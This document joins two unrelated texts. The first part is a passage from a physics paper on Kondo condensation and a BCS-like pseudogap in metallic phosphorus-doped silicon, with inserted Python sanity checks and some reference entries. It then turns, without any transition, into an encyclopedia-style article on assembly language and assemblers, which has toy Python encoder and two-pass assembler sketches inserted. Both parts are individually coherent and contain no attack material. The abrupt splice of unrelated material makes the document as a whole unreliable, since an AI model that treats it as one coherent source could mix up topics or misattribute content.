All of the T- and B-dependent bulk transport, the DOS spectroscopy measurements and the existence of magnetic moments suggest that Kondo physics plays a key role in the formation of a correlated electron ground state in the Si:P metal. The underlying physics of the correlation behaviour is proposed here. That is, for a Si:P metal with a doping density of ~3 × 10^19 cm^−3, more than a 10^−5 fraction of the total impurities induce residual, unscreened localized moments9, and the mean distance between the moments is less than 1 μm, which may be comparable to (or even smaller than) the size of a Kondo cloud. Our proposed ground state is the condensation of overlapping Kondo clouds (Fig. 1b), and as a consequence of Kondo condensation, a fraction of itinerant electrons entangled with magnetic impurities are correlated to form a many-body ground state. This Kondo condensation model is analogous to a Bose–Einstein condensate and, similar to BCS Cooper pairs, a singlet ground state with a small BCS-like gap is formed in the DOS at EF. In fact, the shape and behaviour of the observed pseudogap in the Si:P metal is very similar to a BCS-like gap. In the lower doping regime where the metal–insulator transition occurs, this discovered ground state has not been reported. This is presumably because, although the density of magnetic impurities may be higher in this regime, the density of the itinerant electrons captured by the magnetic impurities to form Kondo clouds is not sufficiently high. This is the reason why the observed Kondo phenomenon occurs in the degenerate metal regime, rather than the impurity band regime.
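The spacing argument can be checked numerically. Taking the figures quoted above — a ~10^−5 fraction of ~3 × 10^19 cm^−3 dopants carrying residual moments — the mean inter-moment distance n^−1/3 indeed comes out well below a micrometre:

```python
# Mean distance between residual local moments in the Si:P metal.
# Both input numbers are the values quoted in the text.
n_dopant = 3e19          # P donors per cm^3
frac_moments = 1e-5      # fraction carrying residual, unscreened moments

n_moment = frac_moments * n_dopant          # moment density, cm^-3
spacing_cm = n_moment ** (-1.0 / 3.0)       # mean spacing ~ n^(-1/3)
spacing_um = spacing_cm * 1e4               # convert cm -> micrometres

print(f"moment density = {n_moment:.1e} cm^-3")
print(f"mean spacing = {spacing_um:.2f} um")  # ~0.15 um, well below 1 um
```

A spacing of roughly 0.15 μm against micrometre-sized Kondo clouds supports the claim that neighbouring clouds overlap substantially.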
To sum up, based on the tunnelling DOS and bulk transport measurements, as well as the fact that magnetic moments are present in the Si:P metal, the proposed microscopic picture responsible for the BCS-like DOS spectrum is Kondo condensation (that is, the overlap of randomly distributed Kondo clouds) and the mechanism for the zero-bias anomaly at elevated temperatures and magnetic fields is electron–electron interaction effects. Thus, the relevant balance between these competing ground states, which leads to a magnetic phase boundary, is controlled by the temperature and magnetic field—as demonstrated by the DOS in the T–B domain.
Understanding many-impurity Kondo physics at a microscopic level remains challenging, especially for disordered solids. In particular, the Kondo effect is a many-body interaction, so it would be inappropriate to apply a single-electron picture. The usual way to tackle the disorder effect is to consider the distribution of the Kondo temperature, which means that the system is described as a sum of independent subsystems with some probability of a given coupling. This is analogous to treating the system as a mixed state, which is an approximation that is only valid when the individual local components of the system (that is, individual Kondo clouds) do not correlate with each other. In such cases, the system can be treated as an ensemble of subsystems with random couplings, thus treating the disorder by summing over the random couplings9. However, the result of such approach is the scaling law in T, which seems to contradict our experimental finding: the observation of the BCS-like pseudogap that is convincing evidence for macroscopic coherence.
The Kondo condensation scenario proposed here can be used to reproduce the observed DOS spectra by considering the correlation effect on the spectrum of itinerant fermions. For this purpose, we introduce the charge-neutral scalar field \(\varphi = \langle c_{\uparrow} f_{\downarrow}^{+} - c_{\downarrow} f_{\uparrow}^{+} \rangle\), where c is an itinerant electron and f^+ is an ion impurity with a net spin of 1/2. Kondo condensation is the configuration in which φ is non-vanishing. If we consider φ as a constant part of the field φ(x), its coupling to the fermion can describe the effects of Kondo condensation on the spectrum of the fermion23. When T or B increases sufficiently, the condensation is destroyed by thermal fluctuations or by Zeeman flips; thus, the pseudogap will disappear, and the system will undergo a transition from a gapped scalar ordered state with Kondo condensation to a paramagnetic DFL state.
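The competition between thermal fluctuations and Zeeman flips can be checked on the back of an envelope: the Zeeman energy gμBB at the field where the pseudogap disappears (~2,000 G) should be comparable to kBT at the crossover temperature T* ~ 160 mK. A rough consistency check, with an assumed electron g-factor of 2 (both scales taken from the text):

```python
# Compare the Zeeman energy at the gap-closing field with k_B * T
# at the crossover temperature T*. g = 2 is an assumption.
mu_B = 5.788e-5   # Bohr magneton, eV/T
k_B = 8.617e-5    # Boltzmann constant, eV/K
g = 2.0           # assumed electron g-factor

B = 0.2           # T (2,000 G, field above which the pseudogap is gone)
T_star = 0.160    # K (temperature where the ZBA first appears at B = 0)

E_zeeman = g * mu_B * B      # ~2.3e-5 eV
E_thermal = k_B * T_star     # ~1.4e-5 eV
print(E_zeeman / E_thermal)  # order unity -> consistent energy scales
```

The two energy scales come out within a factor of two of each other, consistent with a single condensation energy scale being destroyed either thermally or magnetically.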
The calculation for the DOS spectra of this system encounters two sources of difficulty in many-body theories; that is, randomness and strong correlations. A mean-field description of the system that works even for a strongly interacting system would be helpful. One such theory is the holographic theory24,25,26, the validity of which relies on the universality of the system near the quantum critical point. The principle of holography works even after the scale symmetry is slightly broken27, similar to our situation where the scale symmetry is broken due to the presence of Kondo condensation (Supplementary Fig. 9). Figure 5a reveals the modelled pseudogap in the DOS and two DOS peaks at opposite energies, calculated at B = 0. A gap is clearly visible in the DOS at T = 18 mK, whereas for a larger value of T > 160 mK, the pseudogap is closed, which is in qualitative agreement with the experimental G–V curve at B = 0 G and T = 18 mK (Fig. 2d). Because there is a non-zero DOS value at EF (V = 0 V), the corresponding state is a metal. For larger magnetic fields, no strong pseudogap is present in the computed DOS (Fig. 5b). The calculated magnetic-field-dependent DOS spectra are qualitatively similar to the experimental G–V curves (Fig. 3a). In addition to our holographic model, it will be worth checking the reproducibility of our results using other theoretical approaches (Supplementary Information 10).
In conclusion, similarly shaped DOS spectra at EF have been observed in cuprate, pnictide and heavy-fermion superconductors5,6,28,29. In fact, the T–B phase diagram of our Si:P metal in Fig. 4 is also similar to that of the quantum materials listed above. This result is not a surprise because the observed pseudogap behaviours in these materials can be commonly explained by coherent electronic states with a correlation. Although a microscopic understanding of how the order parameter depends on external perturbations such as T, B, pressure, and doping is still challenging, the observation of Kondo condensation and its phase transition in the degenerately doped elemental semiconductor Si will contribute to understanding other quantum materials such as Kondo lattices, spin glasses and high-Tc superconductors. It would also be interesting to experimentally probe the Hall coefficient and shot noise near the quantum critical point, which are expected to display non-Fermi liquid physics30,31,32.
Sample preparation and characterization
The structural, electrical and magnetic properties of bulk Si:P metal were studied using transmission electron microscopy, secondary ion mass spectrometry, magnetoresistance and superconducting quantum interference device measurements (Supplementary Figs. 1–3). Tunnel junction devices were fabricated on a -oriented Si substrate with a P concentration of ~2.6 × 10^19 cm^−3. The SiO2 tunnel barrier was formed by thermal oxidation of the Si:P layer. The tunnel junction device was then completed by depositing a 200-nm-thick top Ag or Al electrode.
The datasets generated and/or analysed during this study are available from the corresponding authors on reasonable request. Source data are provided with this paper.
Codes for performing numeric calculations are available from the corresponding authors upon reasonable request.
Kroha, J. in The Physics of Correlated Insulators, Metals, and Superconductors Modeling and Simulation Series Vol. 7 (eds Pavarini, E. et al.) 12.1–12.27 (Forschungszentrum Julich, 2017).
Aoki, H. & Kamimura, H. The Physics of Interacting Electrons in Disordered Systems (Oxford Univ. Press, 1989).
Paradigm: imperative, unstructured, often metaprogramming (through macros); certain assemblers are object-oriented and/or structured
In computer programming, assembly language (alternatively assembler language or symbolic machine code), often referred to simply as Assembly and commonly abbreviated as ASM or asm, is any low-level programming language with a very strong correspondence between the instructions in the language and the architecture's machine code instructions. Assembly language usually has one statement per machine instruction (1:1), but constants, comments, assembler directives, symbolic labels of, e.g., memory locations, registers, and macros are generally also supported.
The first assembly code in which a language is used to represent machine code instructions is found in Kathleen and Andrew Donald Booth's 1947 work, Coding for A.R.C.. Assembly code is converted into executable machine code by a utility program referred to as an assembler. The term "assembler" is generally attributed to Wilkes, Wheeler and Gill in their 1951 book The Preparation of Programs for an Electronic Digital Computer, who, however, used the term to mean "a program that assembles another program consisting of several sections into a single program". The conversion process is referred to as assembly, as in assembling the source code. The computational step when an assembler is processing a program is called assembly time.
Because assembly depends on the machine code instructions, each assembly language[nb 1] is specific to a particular computer architecture.
Sometimes there is more than one assembler for the same architecture, and sometimes an assembler is specific to an operating system or to particular operating systems. Most assembly languages do not provide specific syntax for operating system calls, and most assembly languages can be used universally with any operating system,[nb 2] as the language provides access to all the real capabilities of the processor, upon which all system call mechanisms ultimately rest. In contrast to assembly languages, most high-level programming languages are generally portable across multiple architectures but require interpreting or compiling, much more complicated tasks than assembling.
In the first decades of computing, it was commonplace for both systems programming and application programming to take place entirely in assembly language. While still irreplaceable for some purposes, the majority of programming is now conducted in higher-level interpreted and compiled languages. In "No Silver Bullet", Fred Brooks summarised the effects of the switch away from assembly language programming: "Surely the most powerful stroke for software productivity, reliability, and simplicity has been the progressive use of high-level languages for programming. Most observers credit that development with at least a factor of five in productivity, and with concomitant gains in reliability, simplicity, and comprehensibility."
Today, it is typical to use small amounts of assembly language code within larger systems implemented in a higher-level language, for performance reasons or to interact directly with hardware in ways unsupported by the higher-level language. For instance, just under 2% of version 4.9 of the Linux kernel source code is written in assembly; more than 97% is written in C.
Assembly language syntax
Assembly language uses a mnemonic to represent, e.g., each low-level machine instruction or opcode, each directive, typically also each architectural register, flag, etc. Some of the mnemonics may be built in and some user defined. Many operations require one or more operands in order to form a complete instruction. Most assemblers permit named constants, registers, and labels for program and memory locations, and can calculate expressions for operands. Thus, programmers are freed from tedious repetitive calculations and assembler programs are much more readable than machine code. Depending on the architecture, these elements may also be combined for specific instructions or addressing modes using offsets or other data as well as fixed addresses. Many assemblers offer additional mechanisms to facilitate program development, to control the assembly process, and to aid debugging.
Some assemblers are column oriented, with specific fields in specific columns; this was very common for machines using punched cards in the 1950s and early 1960s. Some assemblers have free-form syntax, with fields separated by delimiters such as punctuation or white space. Some assemblers are hybrid, with, e.g., labels in a specific column and other fields separated by delimiters; this became more common than column-oriented syntax in the 1960s.
All of the IBM assemblers for System/360, by default, have a label in column 1, fields separated by delimiters in columns 2-71, a continuation indicator in column 72, and a sequence number in columns 73-80. Spaces delimit the label, opcode, operands, and comments, while individual operands are separated by commas and parentheses.
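To make the fixed-column layout concrete, here is a small Python sketch of a reader for that card format. It is a toy illustration only, not any real assembler's scanner; the sample card contents are invented, and the column boundaries follow the System/360 defaults described above.

```python
def parse_card(card: str) -> dict:
    """Split an 80-column card image using the System/360 default layout:
    label starting in column 1, statement fields in columns 2-71 separated
    by spaces, continuation indicator in column 72, sequence in 73-80."""
    card = card.ljust(80)
    statement = card[0:71]
    label, _, rest = statement.partition(" ")
    opcode, _, rest = rest.lstrip().partition(" ")
    return {
        "label": label or None,
        "opcode": opcode or None,
        "operands_and_comments": rest.strip() or None,
        "continuation": card[71] != " ",
        "sequence": card[72:80].strip() or None,
    }

# A hypothetical card: label LOOP, opcode L, operands 3,COUNT, a comment,
# blanks through column 72, and a sequence number in columns 73-80.
card = "LOOP     L     3,COUNT          GET CURRENT COUNT".ljust(72) + "00000100"
parsed = parse_card(card)
```

A card with a blank in column 1 would yield a label of None, matching the convention that an unlabeled statement simply starts after column 1.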
- A macro assembler is an assembler that includes a macroinstruction facility so that (parameterized) assembly language text can be represented by a name, and that name can be used to insert the expanded text into other code.
- Open code refers to any assembler input outside of a macro definition.
- A cross assembler (see also cross compiler) is an assembler that is run on a computer or operating system (the host system) of a different type from the system on which the resulting code is to run (the target system). Cross-assembling facilitates the development of programs for systems that do not have the resources to support software development, such as an embedded system or a microcontroller. In such a case, the resulting object code must be transferred to the target system, via read-only memory (ROM, EPROM, etc.), a programmer (when the read-only memory is integrated in the device, as in microcontrollers), or a data link using either an exact bit-by-bit copy of the object code or a text-based representation of that code (such as Intel hex or Motorola S-record).
- A high-level assembler is a program that provides language abstractions more often associated with high-level languages, such as advanced control structures (IF/THEN/ELSE, DO CASE, etc.) and high-level abstract data types, including structures/records, unions, classes, and sets.
- A microassembler is a program that helps prepare a microprogram, called firmware, to control the low level operation of a computer.
- A meta-assembler is "a program that accepts the syntactic and semantic description of an assembly language, and generates an assembler for that language", or that accepts an assembler source file along with such a description and assembles the source file in accordance with that description. "Meta-Symbol" assemblers for the SDS 9 Series and SDS Sigma series of computers are meta-assemblers.[nb 3] Sperry Univac also provided a Meta-Assembler for the UNIVAC 1100/2200 series.
- An inline assembler (or embedded assembler) is assembler code contained within a high-level language program. It is most often used in systems programs which need direct access to the hardware.
An assembler program creates object code by translating combinations of mnemonics and syntax for operations and addressing modes into their numerical equivalents. This representation typically includes an operation code ("opcode") as well as other control bits and data. The assembler also calculates constant expressions and resolves symbolic names for memory locations and other entities. The use of symbolic references is a key feature of assemblers, saving tedious calculations and manual address updates after program modifications. Most assemblers also include macro facilities for performing textual substitution – e.g., to generate common short sequences of instructions as inline, instead of called subroutines.
Some assemblers may also be able to perform some simple types of instruction set-specific optimizations. One concrete example of this may be the ubiquitous x86 assemblers from various vendors. Called jump-sizing, most of them are able to perform jump-instruction replacements (long jumps replaced by short or relative jumps) in any number of passes, on request. Others may even do simple rearrangement or insertion of instructions, such as some assemblers for RISC architectures that can help optimize a sensible instruction scheduling to exploit the CPU pipeline as efficiently as possible.
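Jump-sizing of the kind just described can be sketched as an iterative relaxation. The following Python toy is not modelled on any particular assembler: it assumes a short jump occupies 2 bytes and reaches a signed 8-bit displacement, a long jump occupies 5 bytes (roughly x86-like), and all other instructions have fixed sizes. It starts optimistically with all jumps short and widens any that do not fit, repeating until the sizes stabilise.

```python
def size_jumps(instrs):
    """instrs: list of ("jmp", target_index) or ("op", size_in_bytes).
    Returns the final size in bytes chosen for each instruction."""
    sizes = [2 if kind == "jmp" else arg for kind, arg in instrs]
    changed = True
    while changed:
        changed = False
        addrs, addr = [], 0
        for s in sizes:                 # addresses implied by current sizes
            addrs.append(addr)
            addr += s
        addrs.append(addr)              # address just past the last instruction
        for i, (kind, arg) in enumerate(instrs):
            if kind == "jmp" and sizes[i] == 2:
                disp = addrs[arg] - (addrs[i] + 2)   # relative to next instruction
                if not -128 <= disp <= 127:
                    sizes[i] = 5        # widen: a short jump cannot reach
                    changed = True
    return sizes

# A jump over a 200-byte instruction must be long; over a 10-byte one, short.
far  = size_jumps([("jmp", 2), ("op", 200), ("op", 1)])
near = size_jumps([("jmp", 2), ("op", 10), ("op", 1)])
```

Because sizes only ever grow, the loop is guaranteed to terminate; assemblers that instead start pessimistic and shrink jumps face the subtler problem that shrinking one jump can let another shrink too, which is why multiple passes are offered "on request".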
Assemblers have been available since the 1950s, as the first step above machine language and before high-level programming languages such as Fortran, Algol, COBOL and Lisp. There have also been several classes of translators and semi-automatic code generators with properties similar to both assembly and high-level languages, with Speedcode as perhaps one of the better-known examples.
There may be several assemblers with different syntax for a particular CPU or instruction set architecture. For instance, an instruction to add memory data to a register in an x86-family processor might be add eax,[ebx] in original Intel syntax, whereas this would be written addl (%ebx),%eax in the AT&T syntax used by the GNU Assembler. Despite different appearances, different syntactic forms generally generate the same numeric machine code. A single assembler may also have different modes in order to support variations in syntactic forms as well as their exact semantic interpretations (such as FASM-syntax, TASM-syntax, ideal mode, etc., in the special case of x86 assembly programming).
Number of passes
There are two types of assemblers based on how many passes through the source are needed (how many times the assembler reads the source) to produce the object file.
- One-pass assemblers process the source code once. For symbols used before they are defined, the assembler will emit "errata" after the eventual definition, telling the linker or the loader to patch the locations where the as yet undefined symbols had been used.
- Multi-pass assemblers create a table with all symbols and their values in the first passes, then use the table in later passes to generate code.
In both cases, the assembler must be able to determine the size of each instruction on the initial passes in order to calculate the addresses of subsequent symbols. This means that if the size of an operation referring to an operand defined later depends on the type or distance of the operand, the assembler will make a pessimistic estimate when first encountering the operation, and if necessary, pad it with one or more "no-operation" instructions in a later pass or the errata. In an assembler with peephole optimization, addresses may be recalculated between passes to allow replacing pessimistic code with code tailored to the exact distance from the target.
The original reason for the use of one-pass assemblers was memory size and speed of assembly – often a second pass would require storing the symbol table in memory (to handle forward references), rewinding and rereading the program source on tape, or rereading a deck of cards or punched paper tape. Later computers with much larger memories (especially disc storage), had the space to perform all necessary processing without such re-reading. The advantage of the multi-pass assembler is that the absence of errata makes the linking process (or the program load if the assembler directly produces executable code) faster.
Example: in the following code snippet, a one-pass assembler would be able to determine the address of the backward reference BKWD when assembling statement S2, but would not be able to determine the address of the forward reference FWD when assembling the branch statement S1; indeed, FWD may be undefined. A two-pass assembler would determine both addresses in pass 1, so they would be known when generating code in pass 2.
S1   B    FWD
     ...
FWD  EQU  *
     ...
BKWD EQU  *
     ...
S2   B    BKWD
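The snippet above can be walked through with a toy two-pass assembler in Python. Everything here is hypothetical for illustration (a fixed 2-byte instruction size, invented opcode names, NOPs standing in for the elided statements); it only demonstrates how pass 1 builds the symbol table that pass 2 consults for both the forward reference FWD and the backward reference BKWD.

```python
# Toy two-pass assembly: every instruction occupies 2 bytes; "B x" branches
# to label x, and "EQU *" defines a label at the current location counter.
SOURCE = [
    ("S1",   "B",   "FWD"),
    (None,   "NOP", None),
    ("FWD",  "EQU", "*"),
    (None,   "NOP", None),
    ("BKWD", "EQU", "*"),
    (None,   "NOP", None),
    ("S2",   "B",   "BKWD"),
]

def assemble(source):
    # Pass 1: walk the source once, recording each label's address.
    symbols, loc = {}, 0
    for label, op, _ in source:
        if op == "EQU":
            if label:
                symbols[label] = loc      # label = current location counter
        else:
            if label:
                symbols[label] = loc
            loc += 2                      # fixed instruction size
    # Pass 2: emit (address, op, resolved_target) records using the table.
    out, loc = [], 0
    for label, op, operand in source:
        if op == "EQU":
            continue
        target = symbols[operand] if op == "B" else None
        out.append((loc, op, target))
        loc += 2
    return symbols, out

symbols, listing = assemble(SOURCE)
```

By the time pass 2 reaches statement S1 at address 0, FWD is already in the table, which is exactly what a one-pass assembler lacks and must patch with errata.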
More sophisticated high-level assemblers provide language abstractions such as:
- High-level procedure/function declarations and invocations
- Advanced control structures (IF/THEN/ELSE, SWITCH)
- High-level abstract data types, including structures/records, unions, classes, and sets
- Sophisticated macro processing (although available on ordinary assemblers since the late 1950s for, e.g., the IBM 700 series and IBM 7000 series, and since the 1960s for IBM System/360 (S/360), amongst other machines)
- Object-oriented programming features such as classes, objects, abstraction, polymorphism, and inheritance
See Language design below for more details.
A program written in assembly language consists of a series of mnemonic processor instructions and meta-statements (known variously as declarative operations, directives, pseudo-instructions, pseudo-operations and pseudo-ops), comments and data. Assembly language instructions usually consist of an opcode mnemonic followed by an operand, which might be a list of data, arguments or parameters. Some instructions may be "implied," which means the data upon which the instruction operates is implicitly defined by the instruction itself—such an instruction does not take an operand. The resulting statement is translated by an assembler into machine language instructions that can be loaded into memory and executed.
For example, the instruction below tells an x86/IA-32 processor to move an immediate 8-bit value into a register. The binary code for this instruction is 10110 followed by a 3-bit identifier for which register to use. The identifier for the AL register is 000, so the following machine code loads the AL register with the data 01100001.

10110000 01100001

This binary computer code can be made more human-readable by expressing it in hexadecimal as follows.

B0 61

Here B0 means 'Move a copy of the following value into AL', and 61 is a hexadecimal representation of the value 01100001, which is 97 in decimal. Assembly language for the 8086 family provides the mnemonic MOV (an abbreviation of move) for instructions such as this, so the machine code above can be written as follows in assembly language, complete with an explanatory comment if required, after the semicolon. This is much easier to read and to remember.

MOV AL, 61h ; Load AL with 97 decimal (61 hex)
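The translation just shown is mechanical enough to sketch in Python. This toy encoder handles only the single MOV r8, imm8 form (opcode byte 0xB0 plus a 3-bit register number, then the immediate byte); it is an illustration, not a general x86 assembler.

```python
# 3-bit register numbers used in the x86 "MOV r8, imm8" encoding,
# where the opcode byte is 0xB0 + register number.
REG8 = {"AL": 0, "CL": 1, "DL": 2, "BL": 3, "AH": 4, "CH": 5, "DH": 6, "BH": 7}

def mov_r8_imm8(reg: str, imm: int) -> bytes:
    """Encode MOV reg, imm as two bytes: opcode, then the immediate."""
    if not 0 <= imm <= 0xFF:
        raise ValueError("immediate must fit in 8 bits")
    return bytes([0xB0 + REG8[reg], imm])

code = mov_r8_imm8("AL", 0x61)   # MOV AL, 61h  ->  bytes B0 61
```

Running the AL example reproduces exactly the two bytes B0 61 worked out by hand above.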
In some assembly languages (including this one) the same mnemonic, such as MOV, may be used for a family of related instructions for loading, copying and moving data, whether these are immediate values, values in registers, or memory locations pointed to by values in registers or by immediate (a.k.a. direct) addresses. Other assemblers may use separate opcode mnemonics such as L for "move memory to register", ST for "move register to memory", LR for "move register to register", MVI for "move immediate operand to memory", etc.
If the same mnemonic is used for different instructions, that means that the mnemonic corresponds to several different binary instruction codes, excluding data (e.g. the 61h in this example), depending on the operands that follow the mnemonic. For example, for the x86/IA-32 CPUs, the Intel assembly language syntax MOV AL, AH represents an instruction that moves the contents of register AH into register AL. The hexadecimal form of this instruction is:

88 E0

The first byte, 88h, identifies a move between a byte-sized register and either another register or memory, and the second byte, E0h, is encoded (with three bit-fields) to specify that both operands are registers, the source is AH, and the destination is AL.
In a case like this, where the same mnemonic can represent more than one binary instruction, the assembler determines which instruction to generate by examining the operands. In the first example, the operand 61h is a valid hexadecimal numeric constant and is not a valid register name, so only the B0 instruction can be applicable. In the second example, the operand AH is a valid register name and not a valid numeric constant (hexadecimal, decimal, octal, or binary), so only the 88 instruction can be applicable.
Assembly languages are always designed so that this sort of unambiguousness is universally enforced by their syntax. For example, in the Intel x86 assembly language, a hexadecimal constant must start with a numeral digit, so that the hexadecimal number 'A' (equal to decimal ten) would be written as 0Ah, specifically so that it cannot appear to be the name of register AH. (The same rule also prevents ambiguity with the names of registers BH, CH, and DH, as well as with any user-defined symbol that ends with the letter H and otherwise contains only characters that are hexadecimal digits, such as the word "BEACH".)
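The operand-classification step can also be sketched in Python. This toy covers exactly the two encodings discussed above, the B0+register immediate form and the 88 register-to-register form, for an 8-bit register destination; the constant syntax (a trailing "h", leading digit required) follows the rule just described.

```python
import re

REG8 = {"AL": 0, "CL": 1, "DL": 2, "BL": 3, "AH": 4, "CH": 5, "DH": 6, "BH": 7}

def encode_mov_to_r8(dest: str, src: str) -> bytes:
    """Pick an encoding for MOV dest, src by classifying the source operand."""
    if src in REG8:
        # Register source: opcode 88, ModRM = 11 src dest (register-direct).
        modrm = 0b11000000 | (REG8[src] << 3) | REG8[dest]
        return bytes([0x88, modrm])
    if re.fullmatch(r"[0-9][0-9A-F]*H", src.upper()):
        # Hex constant: must start with a digit, so 0Ah can never read as AH.
        return bytes([0xB0 + REG8[dest], int(src[:-1], 16)])
    raise ValueError(f"cannot classify operand {src!r}")
```

Both worked examples from the text fall out directly: MOV AL, 61h encodes as B0 61, while MOV AL, AH encodes as 88 E0.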
Returning to the original example, while the x86 opcode 10110000 (B0) copies an 8-bit value into the AL register, 10110001 (B1) moves it into CL and 10110010 (B2) does so into DL. Assembly language examples for these follow.

MOV AL, 1h ; Load AL with immediate value 1
MOV CL, 2h ; Load CL with immediate value 2
MOV DL, 3h ; Load DL with immediate value 3
The syntax of MOV can also be more complex as the following examples show.
MOV EAX, [EBX]    ; Move the 4 bytes in memory at the address contained in EBX into EAX
MOV [ESI+EAX], CL ; Move the contents of CL into the byte at address ESI+EAX
MOV DS, DX        ; Move the contents of DX into segment register DS
In each case, the MOV mnemonic is translated directly into one of the opcodes 88-8C, 8E, A0-A3, B0-BF, C6 or C7 by an assembler, and the programmer normally does not have to know or remember which.
Transforming assembly language into machine code is the job of an assembler, and the reverse can at least partially be achieved by a disassembler. Unlike high-level languages, there is a one-to-one correspondence between many simple assembly statements and machine language instructions. However, in some cases, an assembler may provide pseudoinstructions (essentially macros) which expand into several machine language instructions to provide commonly needed functionality. For example, for a machine that lacks a "branch if greater or equal" instruction, an assembler may provide a pseudoinstruction that expands to the machine's "set if less than" and "branch if zero (on the result of the set instruction)". Most full-featured assemblers also provide a rich macro language (discussed below) which is used by vendors and programmers to generate more complex code and data sequences. Since the information about pseudoinstructions and macros defined in the assembler environment is not present in the object program, a disassembler cannot reconstruct the macro and pseudoinstruction invocations but can only disassemble the actual machine instructions that the assembler generated from those abstract assembly-language entities. Likewise, since comments in the assembly language source file are ignored by the assembler and have no effect on the object code it generates, a disassembler is always completely unable to recover source comments.
Each computer architecture has its own machine language. Computers differ in the number and type of operations they support, in the different sizes and numbers of registers, and in the representations of data in storage. While most general-purpose computers are able to carry out essentially the same functionality, the ways they do so differ; the corresponding assembly languages reflect these differences.
Multiple sets of mnemonics or assembly-language syntax may exist for a single instruction set, typically instantiated in different assembler programs. In these cases, the most popular one is usually that supplied by the CPU manufacturer and used in its documentation.
Two examples of CPUs that have two different sets of mnemonics are the Intel 8080 family and the Intel 8086/8088. Because Intel claimed copyright on its assembly language mnemonics (on each page of their documentation published in the 1970s and early 1980s, at least), some companies that independently produced CPUs compatible with Intel instruction sets invented their own mnemonics. The Zilog Z80 CPU, an enhancement of the Intel 8080A, supports all the 8080A instructions plus many more; Zilog invented an entirely new assembly language, not only for the new instructions but also for all of the 8080A instructions. For example, where Intel uses the mnemonics MOV, MVI, LDA, STA, LXI, LDAX, STAX, LHLD, and SHLD for various data transfer instructions, the Z80 assembly language uses the mnemonic LD for all of them. A similar case is the NEC V20 and V30 CPUs, enhanced copies of the Intel 8086 and 8088, respectively. Like Zilog with the Z80, NEC invented new mnemonics for all of the 8086 and 8088 instructions, to avoid accusations of infringement of Intel's copyright. (It is questionable whether such copyrights can be valid, and later CPU companies such as AMD[nb 5] and Cyrix republished Intel's x86/IA-32 instruction mnemonics exactly with neither permission nor legal penalty.) It is doubtful whether in practice many people who programmed the V20 and V30 actually wrote in NEC's assembly language rather than Intel's; since any two assembly languages for the same instruction set architecture are isomorphic (somewhat like English and Pig Latin), there is no requirement to use a manufacturer's own published assembly language with that manufacturer's products.
There is a large degree of diversity in the way the authors of assemblers categorize statements and in the nomenclature that they use. In particular, some describe anything other than a machine mnemonic or extended mnemonic as a pseudo-operation (pseudo-op). A typical assembly language consists of three types of instruction statements that are used to define program operations:
- Opcode mnemonics
- Data definitions
- Assembly directives
Opcode mnemonics and extended mnemonics
Instructions (statements) in assembly language are generally very simple, unlike those in high-level languages. Generally, a mnemonic is a symbolic name for a single executable machine language instruction (an opcode), and there is at least one opcode mnemonic defined for each machine language instruction. Each instruction typically consists of an operation or opcode plus zero or more operands. Most instructions refer to a single value or a pair of values. Operands can be immediate (value coded in the instruction itself), registers specified in the instruction or implied, or the addresses of data located elsewhere in storage. This is determined by the underlying processor architecture: the assembler merely reflects how this architecture works. Extended mnemonics are often used to specify a combination of an opcode with a specific operand, e.g., the System/360 assemblers use B as an extended mnemonic for BC with a mask of 15, and NOP ("NO OPeration" – do nothing for one step) for BC with a mask of 0.
Extended mnemonics are often used to support specialized uses of instructions, often for purposes not obvious from the instruction name. For example, many CPUs do not have an explicit NOP instruction, but do have instructions that can be used for the purpose. In 8086 CPUs the instruction xchg ax,ax is used for nop, with nop being a pseudo-opcode to encode the instruction xchg ax,ax. Some disassemblers recognize this and will decode the xchg ax,ax instruction as nop. Similarly, IBM assemblers for System/360 and System/370 use the extended mnemonics NOP and NOPR for BC and BCR with zero masks. For the SPARC architecture, these are known as synthetic instructions.
Some assemblers also support simple built-in macro-instructions that generate two or more machine instructions. For instance, with some Z80 assemblers the instruction ld hl,bc is recognized to generate ld l,c followed by ld h,b. These are sometimes known as pseudo-opcodes.
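That kind of built-in expansion can be sketched as a simple table lookup in Python (the table entry mirrors the Z80 example above; the surrounding statements are invented):

```python
# Toy pseudo-opcode table: each entry expands one source statement into
# the real machine instructions that implement it.
PSEUDO_OPS = {
    "ld hl,bc": ["ld l,c", "ld h,b"],   # 16-bit move via two 8-bit moves
}

def expand(statements):
    out = []
    for stmt in statements:
        out.extend(PSEUDO_OPS.get(stmt, [stmt]))  # real opcodes pass through
    return out

program = expand(["ld hl,bc", "add a,b"])
```

A disassembler working backwards from the object code would see only the two 8-bit moves, which is precisely why pseudo-opcodes cannot be recovered from machine code.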
Mnemonics are arbitrary symbols; in 1985 the IEEE published Standard 694 for a uniform set of mnemonics to be used by all assemblers. The standard has since been withdrawn.
There are instructions used to define data elements to hold data and variables. They define the type of data, the length and the alignment of data. These instructions can also define whether the data is available to outside programs (programs assembled separately) or only to the program in which the data section is defined. Some assemblers classify these as pseudo-ops.
Assembly directives, also called pseudo-opcodes, pseudo-operations or pseudo-ops, are commands given to an assembler "directing it to perform operations other than assembling instructions". Directives affect how the assembler operates and "may affect the object code, the symbol table, the listing file, and the values of internal assembler parameters". Sometimes the term pseudo-opcode is reserved for directives that generate object code, such as those that generate data.
The names of pseudo-ops often start with a dot to distinguish them from machine instructions. Pseudo-ops can make the assembly of the program dependent on parameters input by a programmer, so that one program can be assembled in different ways, perhaps for different applications. Or, a pseudo-op can be used to manipulate presentation of a program to make it easier to read and maintain. Another common use of pseudo-ops is to reserve storage areas for run-time data and optionally initialize their contents to known values.
Symbolic assemblers let programmers associate arbitrary names (labels or symbols) with memory locations and various constants. Usually, every constant and variable is given a name so instructions can reference those locations by name, thus promoting self-documenting code. In executable code, the name of each subroutine is associated with its entry point, so any calls to a subroutine can use its name. Inside subroutines, GOTO destinations are given labels. Some assemblers support local symbols which are often lexically distinct from normal symbols (e.g., the use of "10$" as a GOTO destination).
Some assemblers, such as NASM, provide flexible symbol management, letting programmers manage different namespaces, automatically calculate offsets within data structures, and assign labels that refer to literal values or the result of simple computations performed by the assembler. Labels can also be used to initialize constants and variables with relocatable addresses.
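Automatic offset calculation of the kind mentioned above can be illustrated with a few lines of Python; the record layout and field names here are invented, and real assemblers such as NASM handle alignment and nesting that this sketch ignores.

```python
def layout(fields):
    """Assign a byte offset to each (name, size) field, packed sequentially,
    the way an assembler assigns offsets within a structure definition."""
    offsets, offset = {}, 0
    for name, size in fields:
        offsets[name] = offset
        offset += size
    return offsets, offset   # per-field offsets and total structure size

# Hypothetical record: 2-byte id, 4-byte count, 8-byte timestamp.
offsets, total = layout([("id", 2), ("count", 4), ("timestamp", 8)])
```

The programmer can then refer to a field by name while the assembler substitutes the computed constant, so inserting a field renumbers everything automatically.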
